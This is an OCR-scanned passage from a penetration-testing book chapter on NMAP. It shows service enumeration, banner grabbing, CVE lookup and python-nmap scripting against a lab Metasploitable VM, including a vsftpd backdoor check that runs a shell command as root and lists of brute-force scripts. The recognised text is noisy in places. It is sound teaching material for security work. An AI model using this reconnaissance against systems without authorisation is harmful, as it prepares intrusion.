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Another useful NMAP script is smb-enum-shares, as shown in Figure 1-20. 
It lists all the SMB shares on the target system. 


Scan Tools Profile Help 


Target: |192.168.25.130 v Profile: v |Scan 
Command: (nmap --script smb-enum-shares 192.168.25.130 


Services Nmap Output Ports / Hosts Topology Host Details Scans 
OS Host , nmap --script smb-enum-shares 192,168,25,130 s. 


Host is up (6.00185 latency). . 

i 991 closed ports 
@ 192.163.25.13 port STATE SERVICE 

2i/tcp open ftp 

25/tcp open smtp 

110/tcp open pops 

135/tcp open msrpc 

139/tcp open netbios-ssna 

143/tcp open imap 

445/tcp open microsoft-ds 

587/tcp open submission 

3389/tep open ms-wht-server 

MAC Address: 06:0C:29:03;42:64 (VMware) 


| s@b-enum-shares: 

j account used: guest 

| \\192.166.25.130\ ADMINS: 

| Type: STYPE DISKTREE HIODEN 

| Comment: Remote Admin 

[i Anonymous access: <none> 

| Current user access: <none> 

| \\192. 168.25. 130\C$: 

| Type: STYPE DISKTREE HIDDEN 

| Comment: Default share 

| Anonymous access: <none> 

| Current user access: <none> 

| \\192.166.25.130\ 1PCS 

| Type: STYPE IPC HIDDEN 

| Comment: Remote IPC 

| Anonymous access: READ 

| Current user access: READ/WRITE 
| \\192.168.25.130\SharedDocs: 

| Type: STYPE_DISKTREE 

| Comment: 

| Anonymous access: <none> 

| Current user access: READ/WRITE 
| \\192.168.25.130\s: 

| Type: STYPE DISKTREE 

| Comment : 

| Anonymous access: <none> 

| Current user access: READ/WRITE 


“WEE, = Naap done: 1 IP address (1 host up) scanned in 2.28 seconds 
| Filter Hosts 


Figure 1-20. Output of NMAP script smb-enum-shares executed 
against target IP address 
The following are some additional NMAP scripts for SMB enumeration: 
e smb-vuln-ms17-010 
e smb-protocols 
e smb-mbenum 


e smb-enum-users 
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e smb-enum-processes 


e smb-enum-services 


DNS Enumeration 


The Domain Name System is indeed the backbone of the Internet as it 
does the crucial job of translating host names to IP addresses and vice 
versa. It runs on port 53 by default. Enumerating a DNS server can give 

a lot of interesting and useful information. NMAP has several scripts for 
enumerating a DNS service. Figure 1-21 shows a DNS server enumeration 
revealing its version details. 


Zenmap e090 
Scan Tools Profile Help 


Target: | 192.168.25.129 v Profile: | v [Scan 


Command: [nmap -p 53 -A + 192.168.25.129 


Hosts | Services Nmap Output | Ports / Hosts Topology Host Details Scans 
OS Host . nmap -p 53 -A -v 192.168.25.129 +| Details 
| é» 192.168.25.14 Completed NSE at 14:53, 0.00s elapsed à 
Nmap scan report for 192.168.25.129 
Host is up (6.0013s Latency). 


PORT STATE SERVICE VERSION 

53/tcp open domain ISC BINO 9.4.2 

| dns-nsid: 

|. bind.version: 9.4.2 

MAC Address: 00:0C:29:11:8E:B1 (VMware) 

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 
closed port 

Device type: general purpose 

Running; Linux 2.6.x 

OS CPE: cpe:/o: linux: linux kernel:2.6 

OS details: Linux 2.6.9 - 2.6.33 

Uptime guess: 0.009 days (since Wed Oct 3 14:40:38 2018) 
Network Distance: 1 hop 

TCP Sequence Prediction: Difficulty=203 (Good luck!) 

IP ID Sequence Generation: All zeros 


TRACEROUTE 
HOP RTT ADDRESS 
1 1.26 ms 192.168.25.129 


NSE; Script Post-scanning. 
Initiating NSE at 14:53 
Completed NSE at 14:53, 0.00s elapsed 
Initiating NSE at 14:53 
Completed NSE at 14:53, 0.00s elapsed 
Read data files from: /usr/bin/../share/nmap 
OS and Service detection performed. Please report any incorrect results at https:// 
nmap.org/submit/ . 
: 1 IP address (1 host up) scanned in 17.00 seconds 
N > Raw packets sent: 21 (1.670KB) | Revd: 17 (1.382KB) 


Filter Hosts 


Figure 1-21. Output of DNS enumeration executed against a target 
IP address 
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The following are some additional NMAP scripts for DNS enumeration: 
e dns-cache-snoop 
e dns-service-discovery 
e dns-recursion 
e dns-brute 
e dns-zone-transfer 
e dns-nsid 
e dns-nsec-enum 
e dns-fuzz 


e dns-srv-enum 


FTP Enumeration 


File Transfer Protocol (FTP) is the most commonly used protocol for 
transferring files between systems. It runs on port 21 by default. NMAP has 
multiple scripts for enumerating FTP service. Figure 1-22 shows the output 


of two scripts. 
e ftp-syst 
e ftp-anon 


The output shows the FTP server version details and reveals that the 
server is accepting anonymous connections. 
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Scan Jools Profile Help 


INTRODUCTION TO NMAP 


Zenmap 


Target: 192.168.25.129 


EM rap script p-syst 192 168 75.129 script ip-on 


Services | 


Nmap Output | Ports / Hosts Topotogy Host Details Scans 
nmap --script ftp-syst 192.168.25.129 --script ftp-anon 


Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-19 16:04 IST 
Naap scan report for 192.168.25.129 

Host is up (@.00069s latency). 

Not shown; 977 closed ports 

PORT STATE SERVICE 

21/tcp open ftp 

|_ftp-anon: Anonymous FTP login allowed (FTP code 230) 

| ftp-syst: 

| STAT: 

| FTP server status: 

l Connected to 192.168.25.128 

| Logged in as ftp 

l TYPE: ASCII 

[i No session bandwidth limit 

l Session timeout in seconds is 300 

| Control connection is plain text 

l Data connections will be plain text 
I vsFTPd 2.3.4 - secure, fast, stable 
|_End of status 

22/tcp 
23/tcp 
25/tcp 
53/tcp 
86/tcp 
111/tcp 
139/tcp 
445/tep 
512/tcp 
513/tcp 
514/tcp 


rpcbind 
netbios-ssn 
microsoft-ds 


e222222002222 


1099/tcp 
1524/tcp 
2049/tcp open 
2121/tcp open 
3306/tcp open 
5432/tcp open 
5906/tcp open 
6000/tcp open 
6667/tcp open 
8009/tcp open 
8180/tcp open 


rmiregistry 
ingreslock 
nfs 
ccproxy-ftp 
mysql 
postgresql 
vnc 

xıl 

ire 

ajp13 
unknown 


MAC Address: 00:0C:29:11:8E:B1 (VMware) 


“Wy = Naap done: 1 IP address (1 host up) scanned in 1.76 seconds 


Figure 1-22. Output of NMAP scripts ftp-syst and ftp-anon executed 
against a target IP address 


Since the target is running the vsftpd server, you can try another NMAP 


script, which will check whether the FTP server is vulnerable. The script 
ftp-vsftpd-backdoor can be used, as shown in Figure 1-23. 
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Zenmap 9o00 
Scan Tools Profile Help 


Target: | 192.168.25.129 + Profile: v (Scan) ‘Camel 


Command: [nmap ~-script ftp-Wsftpd-backdoor 192.168.25,129 


[HEE] Services | | Nmap Output Ports / Hosts Topology Host Details Scans 


OS Host . nmap --script ftp-vsftpd-backdoor 192. 168.25,129 ~ Detaits 
Not shown: 977 closed ports a 
PORT STATE SERVICE 


@ 192.168.25.13 | 21/tep open ftp 
| ftp-vsftpd-backdoor: 
| VULNERABLE : 

| vsFTPd version 2.3.4 backdoor 

i State: VULNERABLE (Exploitable) 

| IDs: OSVOB:73573 CVE:CVE-2011-2523 

| VSFTPd version 2.3.4 backdoor, this was reported on 2011-07-04. 

| Disclosure date: 2011-07-03 

| Exploit results: 

j Shell command: id 

| Results: uide@(root) gide@(root) 

| References: 

l http: //osvdb.org/73573 

| https: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE - 2611-2523 

| https: //github. com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/ 

vsftpd 234 backdoor. rb 

| http: //scarybeastsecurity. blogspot .com/2011/67/alert-vsftpd-download-backdoored . html 

22/tep open ssh 

23/tcp open telnet 

25/tcp open smtp 

53/tcp open domain 

80/tcp open http 

lll/tcp open rpchind 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

Sl2/tcp open exec 

Si3/tcp open login 

514/tcp open shell 

1099/tcp open rmiregistry 

1524/tep open ingreslock 

2049/tcp open nfs 

2121/tcp open ccproxy-ftp 

3306/tcp open mysql 

5432/tcp open postgresql 

5900/tcp open vnc 

6000/tcp open X11 

6667/tcp open ire 

8009/tcp open ajpl3 

$180/tcp open unknown 

MAC Address: 66:0C:29:11:8E:81 (VMware) 


MEE = Naap done: 1 IP address (1 host up) scanned in 2.88 seconds 
| Filter Hosts 


Figure 1-23. Output of NMAP script ftp-vsftpd-backdoor executed 
against a target IP address 


The result shows that the FTP server is vulnerable; you'll learn how to 
exploit it later in this book. 
The following are some additional NMAP scripts for FTP enumeration: 


e ftp-brute 

e ftp NSE 

e tp-bounce 

e ftp-vuln-cve2010-4221 
e ftp-libopie 
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MySQL Enumeration 


MySQL is one of the most popular open source relational database 
management systems. It runs on port 3306 by default. NMAP has scripts for 
enumerating the MySQL service. Enumerating a MySQL service can reveal 
a lot of potential information that could be further used to attack the target 
database. Figure 1-24 shows the output of the mysql-info script. It shows 
the protocol version details, server capabilities, and the salt value in use. 


Zerenap 


+ Profle: 


ot 2015-09-19 16:06 IST 


Figure 1-24. Output of NMAP script mysql-info executed against a 
target IP address 


The following are some additional NMAP scripts for MySQL enumeration: 
e mysql-databases 
e mysql-enum 
e mysql-brute 
e mysql-query 
e mysql-empty-password 
e mysql-vuln-cve2012-2122 
e mysql-users 
e mysql-variables 
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SSH Enumeration 


The Secure Shell (SSH) protocol is widely used for secure remote logins 
and administration. Unlike Telnet, SSH encrypts the traffic, making the 
communication secure. It runs on port 22 by default. NMAP has scripts for 
enumerating the SSH service. Figure 1-25 shows output of the ssh2-enum- 
algos script. It lists the different encryption algorithms supported by the 
target SSH server. 


Zenmap 
Scan Tools Profile Help 


Target: [192.168.25.29 + Profle 


Command. [nmap --script ssh2-enum-algos 192.168.25.129 


Hosts | Services | Nmap Output Ports / Hosts Topology Host Details Scans 
OS Host + | nmap -script ssh2-enum-algos 192.168.25,129 


Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-19 15:24 IST 
Nmap scan report for 192.168.25.129 
Host is up (0.0065s latency) 
Not shown: 977 closed ports 
PORT STATE SERVICE 
21/tcp open ftp 
22/tcp open ssh 
ssh2-enum-algos: 
kex_algorithms: (4) 
diffie-hellman-group-exchange-sha256 
diffie-hellman-group-exchange-shal 
diffie-hellman-groupl4-shal 
diffie-hellman-groupl-shal 
| server host key algorithms: (2) 
| ssh-rsa 
l ssh-dss 
encryption_algorithms: (13) 
aes128-cbc 


j 
l 
| 
| 
I 
l 
l 


3des-cbe 

blowfish-cbc 

castl28-cbe 

arcfourl28 

arcfour256 

arcfour 

aes192-cbe 

aes256-cbe 

rijndael-cbe@lysator. liu.se 

aes128-ctr 

I aes192-ctr 

I aes256-ctr 

| mac algorithms: (7) 

l hmac-md5 

l hmac-shal 

| umac-64@openssh.com 

| hmac-ripemd160 

| hmac-ripemd160@openssh. com 

I hmac-shal-96 

| hmac-md5-96 
compression algorithms: (2) 

none 
| zlib@openssh.com 


Figure 1-25. Output of NMAP script ssh2-enum-algos executed 
against a target IP address 
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The following are some additional NMAP scripts for SSH enumeration: 


ssh-brute 
ssh-auth-methods 
ssh-run 
ssh-hostkey 
sshv1 


ssh-publickey-acceptance 


SMTP Enumeration 


Simple Mail Transfer Protocol (SMTP) is used for the transmission of 


electronic mail. It runs on port 25 by default. NMAP has several scripts 


for enumerating the SMTP service. These NMAP scripts could reveal 


several weaknesses in the SMTP server such as open relays, acceptance 


of arbitrary commands, and so on. Figure 1-26 shows output of the smtp- 


commands script. It lists various commands that the target SMTP server is 
accepting. 
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Zenmap 
xan Toots Profile Help 
fanget | 192.168.25.129 v Profile: 
Command: [nmap --script smtp-commandd 192.168,25.129 


L 


Hosts Services 


OS Host 


Nmap Cutput | Ports / Hosts Topology Host Details Scans 


«| nmap -script smep-comenands 192.168. 25,129 


Starting Neap 7.60 
finap scan report for 192.168.25.129 
Host is up (6.00265 Latency) 
i 977 closed ports 
PORT STATE SERVICE 
21/tep open ftp 
22/tep open ssh 
23/tep open telnet 


https: //nmap.org } ot 2018-09-19 15:20 IST 


25/t n smtp 
| Brep=coemanda] metasploitadle.localdomain, PIPELINING, SIZE 16240000, VRFY, ETRN, STARTTLS, ENMANCEDSTATUSCODES, SBITMIME, OSN, 
537tcp open dosain 
http 

rpebing 

netbios-ssn 

nicrosoft-ds 

exec 

login 

shell 

rairegistry 


open 
opon 
open 
open 
open 
open 
514/tcp open 
1099/tcp open 


1524/tcp open 
2049/tcp open 
2121/tcp open 
3306/tcp open 
5432/tcp open 
5900/tcp open 
6000/tcp open 


ingreslock 
nts 
ccproxy-ttp 
mysql 
postgresql 
vac 

xı 


ire 
ajpi3 


6067/tcp open 
8009/tcp open 
8180/tcp open unknown 
BAC Address: 00:0C:29:11:8E:81 (VMware) 


Neap done: 1 IP address (1 host up) scanned in 1.82 seconds 


Figure 1-26. Output of NMAP script smtp-commands executed 
against a target IP address 


Many SMTP servers mistakenly enable open relay. This allows anyone 
to connect to the SMTP server without authentication and to send mails. 
This is indeed a critical flaw. NMAP has a script called smtp-open-relay 
that checks whether the target SMTP server allows for open relays, as 
shown in Figure 1-27. 
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Zenmap °oo°o 
Scan Tools Profile Help 


Target: | 192.168.25.129 + Profile: v [Scan] [Canes 


Command: [nmap --script smtp-open-relay| 192.168.25.129 


Services Nmap Output Ports / Hosts Topology Host Details Scans 
OS Host + nmap --script smtp-open-relay 192.168.25.129 g Detaits 


Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-28 12:40 IST 
W 192.168.25.13 | imap scan report for 192.168.25.129 

Host is up (8.0053s latency). 

Not shown: 977 closed ports 

PORT STATE SERVICE 

21/tcp open ftp 

22/tep open ssh 

23/tep open telnet 

25/tcp open smtp 

|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed 

53/tep open domain 

80/tcp open http 

1ll/tcp open rpcbind 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

512/tcp open exec 

513/tcp open login 

514/tcp open shell 

1099/tcp open rmiregistry 

1524/tcp open ingreslock 

2049/tcp open nfs 

2121/tcp open ceproxy-ftp 

3306/tcp open mysql 

5432/tcp open postgresql 

5900/tcp open vnc 

6000/tcp open X11 

6667/tcp open ire 

8009/tcp open ajpl3 

8180/tcp open unknown 

MAC Address: 60:0C:29:11:8E:B1 (VMware) 


Naap done: 1 IP address (1 host up) scanned in 19.19 seconds 
N >’ 


Filter Hosts 


Figure 1-27. Output of NMAP script smtp-open-relay executed 
against a target IP address 


The following are some additional NMAP scripts for SMTP 
enumeration: 


e smtp-enum-users 
e smtp-commands 

e smtp-brute 

e smtp-ntlm-info 

e smtp-strangeport 


e smtp-vuln-cve2011-1764 


33 


CHAPTER 1 INTRODUCTION TO NMAP 


VNC Enumeration 


The Virtual Network Computing (VNC) protocol is commonly used for 
remote graphical desktop sharing. It runs on port 5900 by default. NMAP 
has several scripts for enumerating the VNC service. Figure 1-28 shows the 
output of the vnc-info script. It shows the protocol version details along 
with the authentication type. 

Zenmap 


Scan Tools Profile Help 
larget | 192.168.25.129 v Profile: 


Command: [nmap --script vnc-infol 192.168.25.129 


Hosts | Services Nmap Output Ports / Hosts Topology Host Details Scans 
OS Host + nmap --Script vnc-info 192.168.25,129 


[e 192.168.25.19 Starting Nmap 7.60 ( https://nmap.org } at 2018-09-19 15:13 IST 


Nmap scan report for 192.168.25.129 
Host is up (0.0044s Latency). 

Not shown: 977 closed ports 

PORT STATE SERVICE 

21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 

25/tcp open smtp 

53/tcp open domain 

80/tcp open http 

111/tcp open rpcbind 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 
512/tcp open exec 

513/tcp open login 

514/tcp open shell 

1099/tcp open rmiregistry 
1524/tcp open ingreslock 

2049/tcp open nfs 

2121/tcp open cecproxy-ftp 
3306/tcp open mysql 

5432/tcp open postgresql 

5909 pops n 

| Jvnc-info: 
| Protocol version: 3.3 

l Security types: 

| VNC Authentication (2) 
6000/tcp open 
6667/tcp open irc 

8009/tcp open ajpi3 

8180/tcp open unknown 

MAC Address: 00:0C:29:11:5E:B1 (VMware) 


Nmap done; 1 IP address (1 host up) scanned in 1.70 seconds 


Figure 1-28. Output of NMAP script vnc-info executed against a 
target IP address 
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The following are some additional NMAP scripts for VNC 
enumeration: 


e vnc-brute 
e realvnc-auth-bypass 


e vnc-title 


Service Banner Grabbing 


Any service running on a system usually has a banner associated with it. 

A banner normally contains server version information and may even 
contain organization-specific information such as disclaimers, warnings, 
or some corporate e-mail addresses. It is certainly worthwhile to grab 
service banners to get more information about the target. The NMAP script 
banner probes all services running on the target and grabs their banners, 
as shown in Figure 1-29. 
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Zenmap ooo 
Scan Tools Profile Help 


Target: | 192.168.25.129 v Profile: y Scan 


Command: [nmap script banner 192.168, 25.129] 


Hosts Services Nmap Output Ports / Hosts Topology Host Details Scans 
OS Host « nmap --script banner 192.168.25.129 m Details 


Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-28 11:35 IST 
Nmap scan report for 192.166.25.129 
Host is up (8.60067s Latency). 
Not shown; 977 closed ports 
PORT STATE SERVICE 
2i/tcp open ftp 
|_banner: 220 (vsFTPd 2.3.4) 
22/tcp open ssh 
| banner: SSH-2.0-OpenSSH 4.7p1 Debian-Subuntul 
23/tcep open telnet 
|_banner: \XFF\XFD\xX18\xFF\XFD \xFF\xFD#\xFF\xFD" 
25/tcp open smtp 
| banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu) 
53/tcp open domain 
80/tcp open http 
lil/tcp open rpecbind 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
Sl2/tcp open exec 
| banner: \xOlWhere are you? 
513/tcp open login 
Si4/tcp open shell 
1099/tcp open rmiregistry 
1524/tep open ingreslock 
| banner; root@metasploitable:/# 
2049/tcp open nfs 
2121/tcp open cecproxy-ftp 
| banner: 220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.25.129] 
3306/tcp open mysql 
| banner: >\x@0\x00\x06\x0AS.8.51a-3ubuntuS\x00\x07\ x80\x00\ xd0f${db>QY\x 
| 08, \xXAA\xOB\ x02) xO8\ x00\xOB\ x00) xOB\ x00) xOB\ xO0\ x60 xO0\ xO8\ xO0\ xO0\, . 
5432/tcp open postgresql 
5900/tcp open vnc 
|_banner: RFB 003.003 
6000/tcp open X11 
6667/tcp open irc 
| banner: :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostna 
|_me...\xOD\x@A:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resol... 
8009/tcp open ajpl3 
8180/tcp open unknown 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 

N > 

Filter Hosts Naap done: 1 IP address (1 host up) scanned in 17.19 seconds , 


Figure 1-29. Output of NMAP script banner executed against a 
target IP address 


Detecting Vulnerabilities 


So far, you have seen the NMAP capabilities of port scanning and 
enumeration. Now you'll see how NMAP can be used for conducting 
vulnerability assessments. Though not as comprehensive as vulnerability 
scanners like Nessus and OpenVAS, NMAP can certainly do basic 
vulnerability detection. NMAP does this with the help of Common 
Vulnerabilities and Exposure (CVE) IDs. It searches for matching 

CVEs against the services running on the target. To turn NMAP into 
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a vulnerability scanner, you first need to download and install some 
additional scripts. Figure 1-30 shows the installation of required scripts. 
You first navigate to directory /usr/share/nmap/scripts and then clone 
two git directories, as shown here: 


e https://github.com/vulnersCom/nmap-vulners.git 


e https://github.com/scipag/vulscan.git 


root@kali: /usr/share/nmap/scripts 0o09 


File Edit View Search Terminal Help 

root@kali:~# cd /usr/share/nmap/scripts/ 

root@kali: /usr/share/nmap/scripts# git clone https://github.com/vulnersCom/nmap-v 
ulners.git 

Cloning into 'nmap-vulners'... 

remote: Enumerating objects: 40, done. 

remote: Total 40 (delta ©), reused 0 (delta 0), pack-reused 40 

Unpacking objects: 100% (40/40), done. 

root@kali: /usr/share/nmap/scripts# git clone https://github.com/scipag/vulscan.gi 
t 

Cloning into ‘vulscan’'... 

remote: Enumerating objects: 231, done. 

remote: Total 231 (delta 0), reused © (delta 0), pack-reused 231 

Receiving objects: 100% (231/231), 13.41 MiB | 232.00 KiB/s, done. 

Resolving deltas: 100% (144/144), done. 

root@kali: /usr/share/nmap/scripts# Jj 


Figure 1-30. Git cloning nmap-vulners into local directory 


Once you have downloaded the required scripts, you are all set to 
execute them against the target. You can use the command nmap -sV - 
script nmap-vulners <target IP address>, as shown in Figure 1-31. 
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Zenmap 
Scan Tools Profile Help 
Target: |192.168.25.129 Y Profile: | 


Command: |pmap -sV --script nmap-vulners 192.168.25.129 


[HEE services | Nmap Output | Ports / Hosts Topology Host Details Scans 
OS Host a | nmap -sV --script nmap-vulners 192.168, 25.129 


Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-21 14:30 IST 
Nmap scan report for 192.168.25.129 

Host is up (0.00028s latency). 

Not shown: 977 closed ports 

PORT STATE SERVICE VERSION 


21/tep open ftp vsftpd 2.3.4 

22/tcp open ssh OpenSSH 4.7p1 Debian Subuntul (protocol 2.0) 
23/tcp open telnet Linux telnetd 

25/tcp open smtp Postfix smtpd 

53/tcp open domain Isc BIND 9.4.2 

| vulners: 


| cpe:/a:isce:bind:9.4.2: 
CVE-2008-0122 
CVE -2612-1667 
CVE-2012-3817 
CVE-2608-4163 
CVE-2012-4244 
CVE-2614-8500 
CVE-2612-5166 
CVE -2610-6382 
CVE-2615-8461 
CVE-2015-8704 
CVE-2609-9025 
CVE-2615-8705 
CVE-2010-3614 
CVE-2609-8265 
CVE-2016-8864 
CVE-2016-1286 
CVE-2612-1033 
CVE-26016-9131 
CVE-2615-80098 
CVE-2016-2848 
CVE-2616-9444 
CVE-2611-1910 
CVE-2611-4313 
CVE-2609-8696 
CVE-20616-1285 
CVE-2610-0097 
CVE-2616-2775 
CVE-2616-6176 
CVE-2010-02990 
CVE-2009-4022 


© 
ə 


https://vulners.com/cve/CVE-2008-0122 
https://vulners.com/cve/CVE-2012-1667 
https: //vulners.com/cve/CVE-2012-3817 
https: //vulners .com/cve/CVE-2668-4163 
https: //vulners.com/cve/CVE-2012-4244 
https: //vulners.com/cve/CVE-2014-8500 
https: //vulners.com/cve/CVE-2012-5166 
https: //vulners.com/cve/CVE-2616-0382 
https: //vulners.com/cve/CVE-2015-8461 
https: //vulners .com/cve/CVE-2015-8704 
https: //vulners.com/cve/CVE-2009-9025 
https: //vulners .com/cve/CVE-2615-8705 
https: //vulners.com/cve/CVE-2610-3614 
https: //vulners.com/cve/CVE-2069-0265 
https: //vulners.com/cve/CVE-2016-8864 
https: //vulners.com/cve/CVE-2016-1286 
https: //vulners .com/cve/CVE- 2012-1033 
https: //vulners.com/cve/CVE-2016-9131 
https: //vulners.com/cve/CVE-2015-8800 
https: //vulners.com/cve/CVE-2616-2848 
https: //vulners.com/cve/CVE-2016-9444 
https: //vulners.com/cve/CVE-2611-1910 
https: //vulners.com/cve/CVE-2011-4313 
https: //vulners.com/cve/CVE- 2609-6696 
https: //vulners.com/cve/CVE-2016-1285 
https: //vulners.com/cve/CVE-2010-9097 
https: //vulners.com/cve/CVE-2016-2775 
https://vulners.com/cve/CVE-2616-6170 
https: //vulners.com/cve/CVE-2010-8290 
https: //vulners.com/cve/CVE-2609-4022 


NbSSSSSUUUUDTEUUBUAAAAN YY SOE 
SOCOWWWWOSTSCTSCTSCOCT®OSCLAGTHAMWBROBDAUY: 


Figure 1-31. Output of NMAP script nmap-vulners executed against 
a target IP address 


Interestingly, you can see many CVEs are available against the ISC 
BIND 9.4.2 running on TCP port 53. This CVE information can be used to 
further exploit the target. You can also see several CVEs for TCP port 80 
running the Apache httpd 2.2.8 server, as shown in Figure 1-32. 
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Zenmap 
Scan Tools Profile Help 


Farget: | 192,168,25.129 v Profile: 
Command: {hmap -SV --script nmap-vulners 192.168,25.129 


OS Host < [nmap -s script nmap-vulners 192.168.25.129 
|Z 192.168.25.14 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 
| vulners: 
cpe:/a:apache:http_server:2.2.8: 
CVE-2010-0425 10.0 https://vulners.com/cve/CVE-2010-0425 


| 

| CVE-2011-3192 
| CVE-2017-7679 
| CVE-2013-2249 
| CVE-2009-1898 
| CVE-2009-1891 
| CVE-2012-0883 
| CVE-2009-3555 
| CVE-2013-1862 
| CVE-2007-6750 
| CVE-2014-0098 
| CVE-2009-2699 
| CVE-2013-6438 
| CVE-2011-3368 
| CVE-2008-2364 
| CVE-2014-6231 
| CVE-2010-0408 
| 

| 

| 

| 

| 

| 

| 

| 

| 

| 

| 

| 

| 

| 

| 

| 

le 


N 
C 


https://vulners.com/cve/CVE-2011-3192 
https://vulners.com/cve/CVE-2017-7679 
https://vulners.com/cve/CVE-2013-2249 
https://vulners.com/cve/CVE-2009-1896 
https://vulners.com/cve/CVE-2009-1891 
https://vulners.com/cve/CVE-2012-6883 
https://vulners.com/cve/CVE-2009-3555 
https://vulners. com/cve/CVE-2013-1862 
https://vulners.com/cve/CVE-2007-6758 
https://vulners.com/cve/CVE-2014-6898 
https://vulners.com/cve/CVE-2009-2699 
https://vulners.com/cve/CVE-2013-6438 
https://vulners.com/cve/CVE-2011-3368 
https://vulners.com/cve/CVE-2008-2364 
https://vulners.com/cve/CVE-2014-0231 
https://vulners.com/cve/CVE-2010-6408 
https://vulners.com/cve/CVE-2010-1452 
https://vulners.com/cve/CVE-2009-1195 
https://vulners.com/cve/CVE-2012-6631 
https://vulners.com/cve/CVE-2611-3607 
https://vulners.com/cve/CVE-2012-4558 
https://vulners.com/cve/CVE-2010-6434 
https://vulners.com/cve/CVE-2012-3499 
https://vulners. com/cve/CVE-2011-6419 
https://vulners.com/cve/CVE-2013-1896 
https://vulners.com/cve/CVE-2011-3348 
https://vulners.com/cve/CVE-2008-2939 
https://vulners.com/cve/CVE-2011-3639 
https://vulners.com/cve/CVE-2011-4317 
https://vulners.com/cve/CVE-2012-6053 
https://vulners.com/cve/CVE-2016-8612 
https://vulners.com/cve/CVE-2012-2687 
https://vulners.com/cve/CVE-2011-4415 


NOWWWWWWWWWWWEAKVTTTSPTOTTOHROMHUY 


CVE-2010-1452 
CVE-2669-1195 
CVE-2012-0031 
CVE-2011-3607 
CVE-2012-4558 
CVE-2010-0434 
CVE-2012-3499 
CVE-2011-0419 
CVE-2013-1896 
CVE-2011-3348 
CVE-2008-2939 
CVE-2011-3639 
CVE-2011-4317 
CVE-2012 -0053 
CVE-2016-8612 
CVE-2012-2687 
CVE-2011-4415 


HNWSDhShhSSSSSLESSSEVvUUUUYVUUUUBAN YS 


Figure 1-32. Output of NMAP script nmap-vulners executed against 
a target IP address 
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NMAP Output 


So far, you have scanned various useful NMAP features. It is important to 
note that the output produced by NMAP can be fed to many other security 
tools and products. Hence, you must be aware of different output formats 
that NMAP is capable of producing, shown here: 


Switch Example Description 
-oN nmap 192.168.25.129 Performs a scan on a target IP address 
-oN output.txt and then writes normal output to the file 
output.txt 
-ox nmap 192.168.25.129 Performs a scan on a target IP address 
-oX output. xml and then writes normal output to the 
XML file output. xml 
-oG nmap 192.168.25.129 Performs a scan on a target IP address 
-oG output.grep and then writes greppable output to the 


file output. grep 
--append- nmap 192.168.25.129 Performs a scan on a target IP address 
output -oN file.file and then appends the scan output to a 
--append-output previous scan file 


NMAP and Python 


Throughout this chapter you have seen numerous capabilities of NMAP 
and how NMAP can be used effectively for information gathering, 
enumeration, and active scanning. NMAP can also be invoked and 
executed from various programming languages, making it even more 
powerful. Python is an interpreted high-level programming language 

for general-purpose programming. Python is indeed user-friendly and 
extremely flexible. It has a rich set of ready-to-use libraries for performing 
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various tasks. Getting into the details of Python language basics and 
syntax is beyond the scope for this book. Assuming you have some basic 
knowledge about Python, this section will discuss how you can use Python 
to invoke and automate NMAP scans. 

Python is installed by default on most Unix-based systems. However, 
you need to install the NMAP library separately. On Debian-based 
systems, you can simply use the command pip install python-nmap, 
as shown in Figure 1-33. The command will install the required NMAP 
library. 


root@kali: ~ (- ae Ce x) 
File Edit View Search Terminal Help 
:~# pip install python-nmap 
Collecting python-nmap 
Downloading https://files.pythonhosted.org/packages/dc/f2/9e1a2953d4d824e183ac 
033e3d223055e40e695 fa6db2cb3e94a864eaa84/python-nmap-0.6.1.tar.gz (41kB) 
100% | 51E 164k8/s 
Building wheels for collected packages: python-nmap 
Running setup.py bdist wheel for python-nmap ... done 


Stored in directory: /root/.cache/pip/wheels/bb/a6/48/4d9e2285291b458c3f17064b 
1dac2f2fb0045736cb88562854 
Successfully built python-nmap 
Installing collected packages: python-nmap 
Successfully "planers python-nmap-0.6.1 
:-# 


Figure 1-33. Installing the python-nmap library on a Debian-based 
system 


Now that you have installed the required NMAP library, start the 
Python interpreter from the terminal by typing the python command, and 
import the NMAP library, as shown here: 


root@kali:~# python 

Python 2.7.14+ (default, Dec 5 2017, 15:17:02) 

[GCC 7.2.0] on linux2 

Type "help", "copyright", "credits" or "license" for more 
information. 
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>>> import nmap 
>>> 


You can now create a new object named nmp to invoke the PortScanner 
function. Then initiate a new scan for the target IP address 127.0.0.1 and 
the ports from 1 to 50, as shown here: 


>>> nmp = nmap.PortScanner() 
>>> nmp.scan('127.0.0.1', '1-50') 


The scan completes and gives you the following output: 


{'nmap': {'scanstats': {'uphosts': '1', 'timestr': 'Fri Sep 
21 14:02:19 2018', 'downhosts': '0', ‘totalhosts': '1', 
‘elapsed': '1.06'}, 'scaninfo': {'tcp': {'services': '1-50', 
‘method': 'syn'}}, ‘commandline’: ‘nmap -oX - -p 1-50 -sV 
127.0.0.1'}, 'scan': {'127.0.0.1': {'status': {'state': “up's 


'reason': 'localhost-response'}, 'hostnames': [{'type': ‘PTR’, 
'name': 'localhost'}], 'vendor': {}, 'addresses': {'ipv4': 
'127.0.0.1'}, ‘tcp': {22: {'product': 'OpenSSH', 'state': 
'open', 'version': '7.7p1 Debian 4', 'name': 'ssh', 'conf': 


'10', 'extrainfo': 'protocol 2.0', 'reason': 'syn-ack', 'cpe': 
'cpe:/o:linux:linux_kernel'}}}}} 


Though the previous output is raw, it can certainly be formatted using 
many of the Python functions. Once you have run the initial scan, you can 
explore different functions to retrieve specific scan details. 


scaninfo() 


The scaninfo() function returns scan details such as the method used and 
the port range probed. 


>>> nmp.scaninfo() 
